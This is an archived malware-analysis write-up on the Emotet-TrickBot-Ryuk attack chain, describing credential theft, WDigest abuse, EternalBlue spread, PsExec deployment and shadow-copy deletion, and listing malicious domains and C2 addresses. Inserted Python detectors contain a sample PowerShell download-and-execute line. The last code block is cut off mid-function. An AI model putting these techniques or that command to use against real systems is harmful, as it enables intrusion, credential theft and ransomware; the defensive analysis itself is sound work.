{
	"id": "ee4850d7-bf45-44f2-8f17-a2251e934cfd",
	"created_at": "2026-04-06T00:12:26.776716Z",
	"updated_at": "2026-04-10T03:22:11.927137Z",
	"deleted_at": null,
	"sha1_hash": "d79bac860935bbf5d287f96651e5d0b5b59e4b7e",
	"title": "Triple Threat: Emotet Deploys TrickBot to Steal Data \u0026 Spread Ryuk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3776913,
	"plain_text": "Triple Threat: Emotet Deploys TrickBot to Steal Data \u0026 Spread Ryuk\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 18:46:17 UTC\r\nWHAT IS RYUK RANSOMWARE\r\nRyuk ransomware was first detected in August 2018 in targeted attacks that used an unknown initial infection method. The operators scoped out a target, gained access via Remote Desktop Services or other direct methods, stole credentials, and then went after high-value data and servers to extort the highest ransom possible. By January 2019, an active Ryuk campaign was discovered targeting victims who had previously been infected with TrickBot. Another recently discovered Emotet-TrickBot-Ryuk campaign was also used to deploy the Ryuk ransomware. This research differs from those reports in that it describes each phase of the attack in detail, including the use of TrickBot to steal sensitive information before Ryuk is deployed to ransom the victim's data.\r\nWHAT IS TRICKBOT\r\nAlthough banking trojans typically target individuals to steal bank account credentials, TrickBot has also been used to deliver secondary malware, much as detailed in this research. What distinguishes the campaign described here is that TrickBot is used both to steal sensitive information and to stage the deployment of Ryuk to ransom the victim's data. Criminals targeting large enterprises used spam emails to deliver the Emotet trojan, which in turn distributed TrickBot. Once a machine is infected with TrickBot, it begins to steal sensitive information while the criminal group determines whether the company is in an industry they target. If so, they deliver the Ryuk ransomware.\r\nWHAT IS EMOTET\r\nEmotet was discovered in 2014 and was used by threat actors as a trojan to steal banking credentials. 
More recently, it has been used as a dropper for other sophisticated malware.\r\nEmotet has introduced several advanced capabilities over the years using a modular structure that includes an installation module, a banking module, and a DDoS module. Emotet's main distribution method remains phishing emails, which use various social engineering techniques to fool a user into clicking a malicious link or opening a malicious Microsoft Office file.\r\nPhase One: Emotet Downloads TrickBot\r\nhttps://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware\r\nPage 1 of 39\n\nFlow of the attack as Emotet delivers TrickBot, which delivers Ryuk. Workflow chart originally created by the Kryptos Logic team for their blog on the same topic.\r\nThe first stage of the attack starts with a weaponized Microsoft Office document attached to a phishing email. The document contains malicious macro code. Once the user opens the document, the macro launches cmd.exe, which in turn executes a PowerShell command that attempts to download the Emotet payload.\r\nMacro-embedded Microsoft Word document.\r\nIn recent attacks, Cybereason's research team has spotted Emotet adapting to serve as a dropper for the TrickBot banking trojan, an expansion of its earlier information-stealing role.\r\nThe execution flow starts within outlook.exe, where the phishing email was received. winword.exe then opens the malicious attachment and spawns cmd.exe to run PowerShell; the PowerShell command downloads and executes the Emotet payload. \r\nThe Emotet process tree in the Cybereason Platform.\r\nThis cmd instance has an obfuscated command line. 
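A process-creation rule for the chain just described (outlook.exe -> winword.exe -> cmd.exe -> powershell.exe fetching a payload), as an added example; this is not code from the Cybereason write-up or the Cybereason Platform. It rebuilds each PowerShell process's ancestry from process-creation events, decodes any -EncodedCommand argument to look for download primitives, and scores obfuscation such as caret insertion. The event field names (pid, ppid, image, cmdline), the weights, the threshold and the sample events are constructed for illustration.

```python
# Added example (not from the Cybereason write-up): flag the Office -> cmd.exe
# -> PowerShell download chain from process-creation telemetry.
# Field names, weights, threshold and sample events are constructed.
import base64

OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
B64_CHARS = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=')
DOWNLOAD_HINTS = ('downloadfile', 'downloadstring', 'invoke-webrequest',
                  'net.webclient', 'bitstransfer', 'http://', 'https://')


def decode_encoded_command(cmdline):
    # PowerShell accepts -e/-ec/-enc/-EncodedCommand followed by base64 of a
    # UTF-16LE script. Return the decoded script, or None if absent/invalid.
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        flag = tok.lower().lstrip('-/')
        blob = toks[i + 1]
        if flag in ('e', 'ec', 'enc', 'encodedcommand') and len(blob) >= 40 and set(blob) <= B64_CHARS:
            try:
                return base64.b64decode(blob).decode('utf-16-le')
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def obfuscation_score(cmdline):
    # cmd.exe caret insertion, PowerShell string building and encoded commands
    # each add weight; ordinary administration rarely combines them.
    low = cmdline.lower()
    score = 0
    if cmdline.count('^') >= 5:
        score += 2
    if cmdline.count('+') >= 5 and '$' in cmdline:
        score += 2
    if '[char]' in low or 'frombase64string' in low:
        score += 2
    if decode_encoded_command(cmdline) is not None:
        score += 3
    return score


def ancestry(events, pid):
    # [self, parent, grandparent, ...]; stops at a missing parent or a cycle.
    by_pid = {e['pid']: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]['ppid']
    return chain


def detect_delivery_chain(events, threshold=6):
    findings = []
    for e in events:
        if e['image'].lower() not in ('powershell.exe', 'pwsh.exe'):
            continue
        chain = ancestry(events, e['pid'])
        names = [p['image'].lower() for p in chain]
        decoded = decode_encoded_command(e['cmdline']) or ''
        text = (e['cmdline'] + ' ' + decoded).lower()
        downloads = any(h in text for h in DOWNLOAD_HINTS)
        score = max(obfuscation_score(p['cmdline']) for p in chain)
        if any(n in OFFICE_APPS for n in names[1:]):
            score += 4  # an Office application anywhere up the chain
        if downloads:
            score += 2
        if score >= threshold:
            findings.append({'pid': e['pid'], 'score': score,
                             'chain': names, 'downloads': downloads})
    return findings


# Constructed sample telemetry: the Emotet-style chain and one benign launch.
ENCODED = base64.b64encode(
    'IEX (New-Object Net.WebClient).DownloadString($url)'.encode('utf-16-le')).decode('ascii')
SAMPLE_EVENTS = [
    {'pid': 100, 'ppid': 1, 'image': 'outlook.exe', 'cmdline': 'outlook.exe'},
    {'pid': 101, 'ppid': 100, 'image': 'WINWORD.EXE', 'cmdline': 'winword.exe /n invoice.doc'},
    {'pid': 102, 'ppid': 101, 'image': 'cmd.exe',
     'cmdline': 'cmd /c ^p^o^w^e^r^s^h^e^l^l -NoP -w hidden -enc ' + ENCODED},
    {'pid': 103, 'ppid': 102, 'image': 'powershell.exe',
     'cmdline': 'powershell -NoP -w hidden -enc ' + ENCODED},
    {'pid': 200, 'ppid': 7, 'image': 'explorer.exe', 'cmdline': 'explorer.exe'},
    {'pid': 201, 'ppid': 200, 'image': 'powershell.exe', 'cmdline': 'powershell Get-Process'},
]

if __name__ == '__main__':
    for finding in detect_delivery_chain(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone it reports the single finding for pid 103; the benign explorer.exe -> powershell.exe launch scores 0. In production the ancestry walk should key on process GUIDs rather than PIDs, which Windows reuses.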
\r\nCMD Emotet dropper obfuscated command line. \r\nWhen deobfuscated in memory, the command line resolves to a PowerShell script.\r\nPowerShell Emotet dropper obfuscated command line. \r\nThe PowerShell instance attempts to download the Emotet payload from several malicious domains after “building” the download URLs from multiple string chunks. It saves the payload as 379.exe (SHA1: B521fe7ff72e68165ff767d7dfa868e105d5de8b) and executes it.\r\nThe PowerShell script attempts to download the Emotet payload from the following domains:\r\nefreedommaker[.]com\r\nretro11legendblue[.]com\r\noussamatravel[.]com\r\ncashcow[.]ai\r\nshahdazma[.]com \r\nThe Cybereason Platform identifying the connection to the C2 server to download the Emotet payload.\r\nWhen the Emotet payload executes, it continues the infection by gathering information on the affected machine and by downloading and executing the TrickBot trojan from a pre-configured remote malicious host. \r\nThe process tree of Emotet delivering TrickBot as seen in the Cybereason Platform.\r\nPhase Two: Lateral Movement\r\nTrickBot is a modular trojan that unpacks itself in memory. It is often called a banking trojan; however, its modular structure allows it to add new functionality well beyond collecting banking data, which is just one of its many potential modules. \r\nIn previous iterations, TrickBot was fairly simple. 
However, it has been improved over the years with additional modules that add capabilities such as password collection and detection evasion.\r\nWhen TrickBot executes, it creates an installation folder under C:\\Users\\<username>\\AppData\\Roaming\\%Name%, where %Name% depends on the bot version. This folder contains a copy of the malware under a slightly different name, a settings.ini file, and a Data folder. \r\nTrickBot’s installation folder.\r\nsettings.ini is an obfuscated file that contains an encoded BotKey. The BotKey is generated uniquely per machine. We were able to extract the BotKey and decrypt the modules and their configuration files. \r\nThe contents of settings.ini.\r\nThe Data folder contains the encrypted malicious modules along with their configuration files. \r\nThe contents of the Data folder.\r\nTo ensure persistence, TrickBot creates a scheduled task and a service. The scheduled task's name depends on the variant of the malware; in this case it is named \\NetvalTask. \r\nTrickBot persistence using a scheduled task.\r\nThe service's registry key name is randomly generated and located under the services hive (HKLM\\System\\CurrentControlSet\\Services\\{Random_name}\\ImagePath).\r\nTrickBot persistence using the registry key.\r\nThe malicious modules are reflectively injected into legitimate processes, including svchost.exe, in order to evade detection. 
To reduce the likelihood of being detected by an antimalware product, TrickBot tries to disable and delete Windows Defender.\r\nThe Cybereason Platform shows the process flow of how TrickBot disables Windows Defender.\r\nLoading and Running TrickBot’s Malicious Modules\r\nThe malicious modules are reflectively loaded into svchost.exe. Below are descriptions of the modules and how each fulfils its role in TrickBot’s malicious activity.\r\nTrickBot modules reflectively loaded into svchost. \r\nmodule64.dll\r\nmodule64.dll is the TrickBot dropper. It downloads the TrickBot loader mswvc.exe (SHA1: f84e0f022a0a263146e94ae3dd38cb5a8534fbfa) and installs it locally or on a network share for lateral movement.\r\nNote: This writeup renames mswvc.exe to trickbot.exe to facilitate the understanding of the attack (SHA1: d6ee45108278bc13df1bdcc6280f4daba11e05c5).\r\nThe module connects over HTTP to a hardcoded address and writes the response to a local file; the payload masquerades as a PNG image. In this instance, the malware fetched the file from http://192.161.54[.]60/radiance.png and dumped its contents locally.\r\nConnection to the distribution server and download of the payload as shown in the Cybereason Platform.\r\nThe module receives the contents of the PNG payload, writes it to a local file on the machine, and copies it to network shares to spread and improve lateral movement. \r\nNetwork share folders that TrickBot uses to spread.\r\nThe dropped file is registered as an auto-start service to give TrickBot persistence and a foothold on the target machine. 
This service can have any one of the display names in the figure below.\r\nService display names.\r\nService creation.\r\nmodule.dll\r\nmodule.dll steals data from the browser, including cookies, HTML5 local storage, browsing history, Flash Local Shared Objects, and URL hits. TrickBot injects module.dll into svchost.exe, which creates a hidden virtual instance of the victim's desktop. It harvests browser data by creating a tunnel and listening for connections through other svchost.exe processes that were also injected with module.dll and listen on the same ports. \r\nmodule.dll injected into svchost.exe.\r\nProxy tunneling of the explorer browser.\r\nInjected svchost listening on the same port.\r\nThe module draws on several artifacts that store sensitive data: browser-related registry entries, installed browser plugins, and the browsers' locally stored SQLite databases, which it reads with hard-coded SQLite queries.\r\nBrowser registry entries hard-coded into module.dll.\r\nSQLite is used to retrieve and steal cookies.\r\nInformation gathering on the installed plugins.\r\nThe following images were also hardcoded in Base64 encoding in module.dll. \r\nBase64-decoded pictures.\r\nvncsrv.dll\r\nTrickBot uses a hidden VNC server injected into svchost.exe as a remote administration tool. The hidden VNC allows an attacker to remotely view and control a victim’s desktop without the victim noticing.\r\nThe injected svchost, loaded with vncsrv.dll, spawns a Chrome browser instance. 
The browser instance launches with command-line switches that alter the browser's default settings to evade detection and bypass its security mechanisms, in this case the Chrome sandbox. To stay hidden, TrickBot disables any interaction with the user interface, including audio and graphics, so the user on the victim machine notices nothing. The hidden VNC leverages TrickBot’s foothold to simplify the process of logging into the victim’s financial institution. \r\nSetting interruption for the Chrome browser.\r\nsocks5dll.dll\r\nIn previous iterations, this module communicated with the TrickBot C2 server using the SOCKS protocol to tunnel data and connections through the victim’s host. SOCKS5 adds authentication, so that only authorized users can access the proxy tunnel, and supports tunneling of DNS requests, which eliminates the threat of DNS leaks. socks5dll.dll has hardcoded C2 servers with which it creates an authenticated connection.\r\nThe Cybereason Platform information on the TrickBot C2 server.\r\nThe connection to the TrickBot C2 server as shown in the Cybereason Platform.\r\nThe malware uses the user agent Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) to connect to one of the hard-coded TrickBot C2 IPs in socks5dll.dll. Note that no Windows NT 9.0 release exists, which makes this string a useful detection pivot in proxy logs:\r\n69.164.196[.]21\r\n107.150.40[.]234\r\n162.211.64[.]20\r\n217.12.210[.]54\r\n89.18.27[.]34\r\n193.183.98[.]154\r\n51.255.167[.]0\r\n91.121.155[.]13\r\n87.98.175[.]85\r\n185.97.7[.]7 \r\nsystemInfo.dll\r\nsystemInfo.dll helps the attacker determine whether the affected machine meets the criteria for infection with the Ryuk ransomware. TrickBot uses this module to harvest system information from the infected machine to give the attackers a better understanding of the system they have compromised. 
It uses WQL to query Win32_Processor and harvest information about the machine's processor and system architecture (32-bit or 64-bit). \r\nThe use of WQL by systeminfo.dll. \r\nTrickBot also uses the native Windows API functions GetNativeSystemInfo() and GetSystemInfo() to get more information about the machine.\r\nThe native Windows API being used to harvest information by systeminfo.dll.\r\nmailsearcher.dll\r\nmailsearcher.dll searches all files on disk and compares their extensions to a predefined list.\r\nA predefined list of extensions the malware searches for.\r\nmailsearcher.dll also uses the WinHTTP library to send data over HTTP to the C2 server.\r\nThe use of the WinHttp library.\r\nloader.dll\r\nloader.dll’s sole purpose is to ensure that the other modules are successfully loaded reflectively.\r\npwgrab.dll\r\npwgrab.dll harvests saved user credentials from browsers, registry keys, and other programs such as Outlook. \r\nTrickBot steals usernames and passwords by copying the Chrome Login Data database, and steals card details by copying the Web Data database. The stored secrets are encrypted, so TrickBot decrypts them and saves the data as plain text. \r\nTrickBot copying the Chrome database files.\r\ncore-dll.dll\r\ncore-dll.dll is the main TrickBot bot. 
There are two layers of protection the malware must remove before it can be used: the module is encrypted and stored inside the loader as one of its resources, and it is packed. Following decryption and unpacking, it is reflectively injected into the following browsers to steal credentials.\r\nThe browsers targeted in core-dll.dll.\r\nExporting the reflective DLL injection library.\r\ndll.dll\r\nTrickBot’s reverse-shell module, dll.dll, is responsible for two things. First, it performs reconnaissance to collect information about the target machine. Second, it launches PowerShell Empire to perform reconnaissance with the end goal of launching an Empire backdoor. To initiate reconnaissance, TrickBot uses this DLL to run commands such as ipconfig, net commands, and nltest. \r\nA breakdown of the reconnaissance activity of TrickBot by the Cybereason Platform.\r\nThe floating module responsible for the reconnaissance activity.\r\nAs mentioned, TrickBot also uses PowerShell Empire to perform reconnaissance and lateral movement. dll.dll executes obfuscated PowerShell scripts in order to download and launch an Empire backdoor. As part of its reconnaissance, TrickBot uses Invoke-Portscan to locate valuable assets in the organization, including domain controllers and file servers. The collected data is then used to target those assets and infect them with the Ryuk ransomware. \r\nA visualization of the PowerShell Empire process tree by the Cybereason Platform.\r\nThe Top Port scan by the Cybereason Platform. 
\r\nscreenLocker_x64.dll\r\nscreenLocker_x64.dll helps TrickBot with its reconnaissance and credential harvesting process. After being injected by TrickBot, svchost.exe was seen injecting into explorer.exe as well.\r\nsvchost.exe injecting into explorer.exe. \r\nOne of the modules loaded into explorer.exe is one of TrickBot’s own modules: screenLocker_x64.dll. \r\nEvidence of the screenLocker module being loaded by explorer.exe. \r\nTrickBot uses a component of mimikatz to extract credentials from the target system. It targets WDigest credentials, which LSASS keeps in memory in plain text. Microsoft mitigated this by adding a switch in the form of a registry value, UseLogonCredential under HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest, and addressed the issue in KB2871997 and KB2928120.\r\nTo disable the caching of WDigest credentials in memory, UseLogonCredential must be set to 0. To ensure the tool succeeds in obtaining user credentials, the module re-enables caching by setting the value to 1. However, credentials are only placed in memory when a user logs on after the registry change, so the module starts a routine that locks the user's screen, forcing them to re-enter their credentials to regain access to the system. \r\nThe LockWorkStation function, which is in charge of locking the user's screen.\r\nThe WDigest registry path (\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\Wdigest\\) is hard-coded inside the module; it controls credential caching and does not itself hold credentials. \r\nThe WDigest registry entry.\r\nThe module contains a list of Microsoft operating systems to compare against the operating system of the infected machine while performing its role in TrickBot’s activity. 
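Two checks for the WDigest abuse described above, added here as an example and not taken from the Cybereason write-up: assess_wdigest interprets the UseLogonCredential DWORD (and read_wdigest_value reads it live on a Windows host), and correlate_wdigest_lock pairs a Sysmon event 13 registry write that sets the value to 1 with a subsequent workstation lock (Security event 4800) and unlock (4801) on the same host, which is the sequence the screenLocker module needs before it can harvest credentials. Event field names, the sample events and the 30-minute window are assumptions.

```python
# Added example (not from the Cybereason write-up). Two checks for the WDigest
# manipulation: a static reading of UseLogonCredential and a correlation over
# host telemetry pairing a registry write of 1 with a workstation lock
# (Security 4800) and unlock (4801) on the same host. Event field names, the
# sample events and the 30-minute window are constructed assumptions.
import sys
from datetime import datetime, timedelta

WDIGEST_KEY = r'SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
WDIGEST_VALUE = 'UseLogonCredential'


def _norm(path):
    # Case-fold and unify separators so Sysmon TargetObject strings compare cleanly.
    return path.replace(chr(92), '/').lower()


WDIGEST_TARGET = _norm('HKLM/' + WDIGEST_KEY + '/' + WDIGEST_VALUE)


def assess_wdigest(value):
    # value: the DWORD, or None when the value is absent.
    if value == 1:
        return ('ENABLED', 'plaintext WDigest credentials are cached in LSASS; set to 0 and force re-logon')
    if value == 0:
        return ('DISABLED', 'UseLogonCredential=0')
    if value is None:
        return ('UNSET', 'value absent; effective behaviour depends on OS and patch level, set it to 0 explicitly')
    return ('UNKNOWN', 'unexpected value %r' % (value,))


def read_wdigest_value():
    # Live read of the value; Windows only. None means the value is absent.
    if sys.platform != 'win32':
        raise RuntimeError('registry read requires Windows')
    import winreg
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WDIGEST_KEY) as key:
        try:
            return winreg.QueryValueEx(key, WDIGEST_VALUE)[0]
        except FileNotFoundError:
            return None


def parse_sysmon_dword(details):
    # Sysmon event 13 renders DWORD data as 'DWORD (0x00000001)'.
    if details.upper().startswith('DWORD') and '(' in details and ')' in details:
        return int(details[details.index('(') + 1:details.index(')')], 16)
    return None


def correlate_wdigest_lock(events, window=timedelta(minutes=30)):
    # events: dicts with ts (datetime), host, kind in {'sysmon13',
    # 'security4800', 'security4801'}; sysmon13 also carries image, target, details.
    findings = []
    by_host = {}
    for e in sorted(events, key=lambda e: e['ts']):
        by_host.setdefault(e['host'], []).append(e)
    for host, evs in by_host.items():
        for i, e in enumerate(evs):
            if e['kind'] != 'sysmon13' or _norm(e['target']) != WDIGEST_TARGET:
                continue
            if parse_sysmon_dword(e['details']) != 1:
                continue
            later = [x for x in evs[i + 1:] if x['ts'] - e['ts'] <= window]
            locked = next((x for x in later if x['kind'] == 'security4800'), None)
            unlocked = None
            if locked is not None:
                unlocked = next((x for x in later if x['kind'] == 'security4801' and x['ts'] > locked['ts']), None)
            findings.append({'host': host, 'set_at': e['ts'], 'image': e.get('image'),
                             'locked': locked is not None, 'unlocked': unlocked is not None,
                             'severity': 'high' if unlocked is not None else 'medium'})
    return findings


# Constructed sample telemetry: WS01 shows the full set-lock-unlock sequence
# from explorer.exe (the process TrickBot injects); WS02 shows a legitimate
# hardening write of 0 and must not be flagged.
T0 = datetime(2019, 4, 1, 9, 0, 0)
TARGET = r'HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential'
SAMPLE_EVENTS = [
    {'ts': T0, 'host': 'WS01', 'kind': 'sysmon13', 'image': r'C:\Windows\explorer.exe',
     'target': TARGET, 'details': 'DWORD (0x00000001)'},
    {'ts': T0 + timedelta(seconds=5), 'host': 'WS01', 'kind': 'security4800'},
    {'ts': T0 + timedelta(minutes=2), 'host': 'WS01', 'kind': 'security4801'},
    {'ts': T0, 'host': 'WS02', 'kind': 'sysmon13', 'image': r'C:\Windows\System32\gpupdate.exe',
     'target': TARGET, 'details': 'DWORD (0x00000000)'},
]

if __name__ == '__main__':
    for finding in correlate_wdigest_lock(SAMPLE_EVENTS):
        print(finding)
```

A write of 1 with no lock that follows is still reported at medium severity, since the attacker may simply wait for the next natural logon instead of forcing one.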
\r\nA list of the operating systems inside the screen locker module.\r\nThe part of the module that locks the affected user's workstation is located in the file's overlay. An indicator in the module points to another file embedded inside it: \r\nThe overlay indicator.\r\nBy dumping the module's overlay to a file and opening it in a hex editor, it’s possible to see that the overlay contains the WDigest registry path as well as the name of the process the module will be injected into to fetch the user's credentials (explorer.exe). \r\nContents of the dumped file opened in a hex editor.\r\nA full flow visualized in the Cybereason Platform of the screenLocker_x64.dll module and related injections.\r\nspreader_x64.dll\r\nspreader_x64.dll contains two of TrickBot's main capabilities: spreading by exploiting the EternalBlue vulnerability (CVE-2017-0144, SMBv1), and using mimikatz to perform credential theft.\r\nThe Cybereason Platform identified lsass access (the mimikatz activity of dumping the memory of lsass.exe), floating executable code (the reflectively injected DLL spreader_x64.dll), and a high internal connection rate, which indicates that it is scanning the network in order to spread.\r\nEvidence of the malicious activity perpetrated by spreader_x64.dll, shown by the Cybereason Platform.\r\nspreader_x64.dll uses the EternalBlue vulnerability to spread via SMB (TCP port 445). \r\nA Cybereason Platform visualization of the connection via port 445 as part of EternalBlue. 
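The 'high internal connection rate' indicator mentioned above can be computed from flow or firewall logs. The following added example (not code from the Cybereason write-up or platform) counts, per source host, the distinct internal destinations contacted on TCP/445 inside a sliding window and reports sources that exceed a fan-out threshold; a file server receiving many clients is not flagged because fan-out is measured per source. Flow field names, the internal address ranges, the 60-second window, the threshold of 20 and the sample flows are constructed assumptions.

```python
# Added example (not from the Cybereason write-up or its platform): per-source
# fan-out on TCP/445 inside a sliding window, the signal behind a 'high
# internal connection rate' alert. Flow field names, internal ranges, window,
# threshold and the sample flows are constructed assumptions.
from collections import deque
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

INTERNAL = [ip_network('10.0.0.0/8'), ip_network('172.16.0.0/12'), ip_network('192.168.0.0/16')]


def is_internal(addr):
    a = ip_address(addr)
    return any(a in net for net in INTERNAL)


def smb_fanout(flows, window=timedelta(seconds=60), threshold=20):
    # flows: dicts with ts (datetime), src, dst, dport. Returns
    # {src: (peak distinct destinations, time of peak)} for sources whose
    # distinct-destination count on 445 inside the window reached threshold.
    hits = {}
    recent = {}  # src -> deque of (ts, dst) still inside the window
    for f in sorted(flows, key=lambda f: f['ts']):
        if f['dport'] != 445 or f['src'] == f['dst']:
            continue
        if not (is_internal(f['src']) and is_internal(f['dst'])):
            continue
        q = recent.setdefault(f['src'], deque())
        q.append((f['ts'], f['dst']))
        while q and f['ts'] - q[0][0] > window:
            q.popleft()
        distinct = len({dst for _, dst in q})
        if distinct >= threshold and distinct > hits.get(f['src'], (0, None))[0]:
            hits[f['src']] = (distinct, f['ts'])
    return hits


# Constructed sample flows: one host sweeping its /24 on 445 (the spreader),
# many workstations legitimately reaching one file server, and an admin host
# touching a handful of servers.
T0 = datetime(2019, 4, 1, 10, 0, 0)
SAMPLE_FLOWS = []
for i in range(1, 61):
    SAMPLE_FLOWS.append({'ts': T0 + timedelta(seconds=i // 2), 'src': '10.0.1.50',
                         'dst': '10.0.1.%d' % i, 'dport': 445})
for i in range(100, 125):
    SAMPLE_FLOWS.append({'ts': T0 + timedelta(seconds=i - 100), 'src': '10.0.1.%d' % i,
                         'dst': '10.0.1.5', 'dport': 445})
for i in range(1, 6):
    SAMPLE_FLOWS.append({'ts': T0 + timedelta(seconds=i), 'src': '10.0.1.200',
                         'dst': '10.0.2.%d' % i, 'dport': 445})

if __name__ == '__main__':
    for src, (count, when) in smb_fanout(SAMPLE_FLOWS).items():
        print(src, count, when)
```

Tune the threshold against a baseline of your own environment; vulnerability scanners and backup servers are the usual legitimate sources of high fan-out on 445 and should be allow-listed by address rather than by raising the threshold.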
\r\nEternalBlue strings in the spreader_x64.dll binary.\r\nspreader_x64.dll also contains the mimikatz binary. When executed, it dumps credentials by opening a command prompt window and running mimikatz.\r\nPwDumper_x64.dll is also reflectively injected into the svchost process in order to perform the dumping.\r\nPwDumper_x64.dll reflectively loaded into svchost.exe. \r\nmimikatz strings in the spreader_x64.dll binary.\r\nmimikatz strings in the spreader_x64.dll library.\r\nPhase Three: Post-exploitation Activity\r\nOnce the machine is infected with TrickBot, the attackers check whether the target belongs to an industry they are looking to target. If it does, they download an additional payload and use the admin credentials stolen by TrickBot to move laterally and reach the assets they wish to infect. \r\nThe attacker logged into a domain controller and copied tools into a temporary directory, including AdFind.exe (the Active Directory enumeration utility), a batch script that uses AdFind to save its output into text files, and a copy of the 7-Zip archive utility. \r\nAfter the attacker gathers a list of domain controllers and targeted servers in the environment, they test whether a connection is available using ping.exe and mstsc.exe (RDP). \r\nOnce the attacker has a connection, they start to spread the Ryuk payload through the network via Windows administrative shares (MITRE ATT\u0026CK technique T1077, since retired into T1021.002, Remote Services: SMB/Windows Admin Shares). ADMIN$, IPC$ and C$ are hidden shares enabled by default on Windows hosts for administrative purposes; share$ is not a default share, but any share whose name ends in $ is likewise hidden from browsing.\r\nThe attacker drops a few files in the hidden share share$, including a .bat script COPY.bat. 
Alongside it are one or more text files (comps{number}.txt) listing the targeted machines the attacker located, a copy of psexec.exe that is signed and verified, and the Ryuk dropper Ryuk.exe. The attacker runs the .bat script, which uses psexec.exe with the stolen admin credentials to obtain a remote shell and copy the malicious Ryuk payload to a temporary folder on each remote host listed in comps{number}.txt. \r\nExecution of the .bat script as shown in the Cybereason Platform.\r\nThe PsExec command line. \r\nOnce this is complete, the Ryuk payload is executed using PsExec.\r\nThe attack flow, beginning with the malicious email and ending with the Ryuk execution. \r\nRyuk Ransomware Delivered\r\nThe ransomware dropper Ryuk.exe checks the system architecture and drops its main payload accordingly. \r\nThe Ryuk ransomware analysis: checking the system architecture.\r\nWhile dropping the payload, it generates a random five-letter name from a pseudo-random generator seeded with srand(). The payload is stored under this name in a location that depends on the OS version of the target machine. If the OS version is XP or older, it writes the file to \\Documents and Settings\\Default User\\. 
If the target machine is running a newer version, it writes the file to \\Users\\Public\\.\r\nThe Ryuk ransomware analysis: choosing the target folder.\r\nThe dropper also stops multiple services related to antimalware products using the net stop command:\r\nThe Ryuk ransomware analysis: net stop commands.\r\nIt kills multiple processes related to antimalware products using the taskkill command. \r\nThe Ryuk ransomware analysis: taskkill commands. \r\nThe main Ryuk payload (hszuw.exe, SHA1: d78c955173c447cb79fb559de122563d90d5358d) is responsible for injecting into other processes and achieving persistence through the registry. \r\nThe Ryuk payload creates persistence, shown in the Cybereason Platform.\r\nThe registry value is created under the current user's Run key (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) and named svchos; it runs the Ryuk payload every time the current user logs on. \r\nCreation of the registry key.\r\nThe malware creates a snapshot of all running processes using CreateToolhelp32Snapshot() and iterates over it using Process32First() and Process32Next().\r\nThe malware then compares each process's executable name against lsass.exe, csrss.exe, and explorer.exe. 
If the process is not one of the above, the malware injects the malicious payload into it.\r\nThe Ryuk ransomware analysis: checking the running processes.\r\nThe Ryuk ransomware analysis: creating exceptions.\r\nIn this example, the payload was injected into several processes, including taskhost.exe: \r\nThe Ryuk payload injects into the remote process taskhost.exe.\r\nThe floating PE in taskeng.exe.\r\nRyuk uses the classic remote-thread injection technique: it obtains a handle to the target process with OpenProcess(), allocates a buffer in that process's address space with VirtualAllocEx(), writes its own image into the buffer with WriteProcessMemory(), and creates a remote thread to execute it with CreateRemoteThread().\r\nFunctions used for process injection in the Ryuk binary.\r\nThe injected processes, in this case taskhost.exe, run a .bat file dropped by the malware, C:\\Users\\Public\\window.bat. This file contains multiple vssadmin and del commands that reconfigure shadow storage and delete Volume Shadow Copies. vssadmin.exe is a command-line tool that manages the Volume Shadow Copy Service (VSS), which captures consistent point-in-time images of volumes for backup on running systems. Ransomware commonly uses vssadmin.exe to delete shadow copies and other backups before encrypting the files themselves. 
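A command-line rule for the shadow-copy and backup destruction described above, added as an example and not taken from the Cybereason write-up. Besides the explicit Delete Shadows call it treats capping shadow storage at a small maxsize as destructive, since Windows evicts existing shadow copies to fit the new limit, and it flags recursive quiet deletion of backup file types. The tag names, severity thresholds and sample command lines are constructed; the sample mirrors the structure of window.bat for one volume.

```python
# Added example (not from the Cybereason write-up). A process-creation style
# rule for backup destruction (ATT&CK T1490, Inhibit System Recovery):
# vssadmin deleting shadows or capping shadow storage so existing copies are
# evicted, wmic shadowcopy deletion, and recursive quiet deletion of backup
# file types. Tag names, thresholds and sample command lines are constructed.
BACKUP_EXTS = ('.vhd', '.vhdx', '.bac', '.bak', '.bkf', '.wbcat', '.set')
NOT_TARGETS = {'del', 'erase', 'cmd', 'cmd.exe'}


def _basename(token):
    # Last path component, accepting either separator.
    return token.replace(chr(92), '/').rsplit('/', 1)[-1]


def classify_command(cmdline):
    # Returns a list of (tag, detail) pairs; empty when nothing backup-destructive is seen.
    toks = cmdline.split()
    if not toks:
        return []
    low = [t.lower() for t in toks]
    exe = _basename(low[0])
    tags = []
    if exe in ('vssadmin', 'vssadmin.exe'):
        if 'delete' in low and 'shadows' in low:
            tags.append(('vss_delete', 'vssadmin delete shadows'))
        if 'resize' in low and 'shadowstorage' in low:
            size = next((t.split('=', 1)[1] for t in low if t.startswith('/maxsize=')), '')
            if size.endswith('kb') or size.endswith('mb'):
                tags.append(('vss_shrink', 'shadow storage capped at ' + size))
    elif exe in ('wmic', 'wmic.exe') and 'shadowcopy' in low and 'delete' in low:
        tags.append(('vss_delete', 'wmic shadowcopy delete'))
    elif exe in ('del', 'erase') or (exe in ('cmd', 'cmd.exe') and 'del' in low):
        switches = {t for t in low if t.startswith('/')}
        targets = [t for t in low if not t.startswith('/') and t not in NOT_TARGETS]
        exts = sorted({e for e in BACKUP_EXTS for t in targets if t.endswith(e)})
        named = any('backup' in _basename(t) for t in targets)
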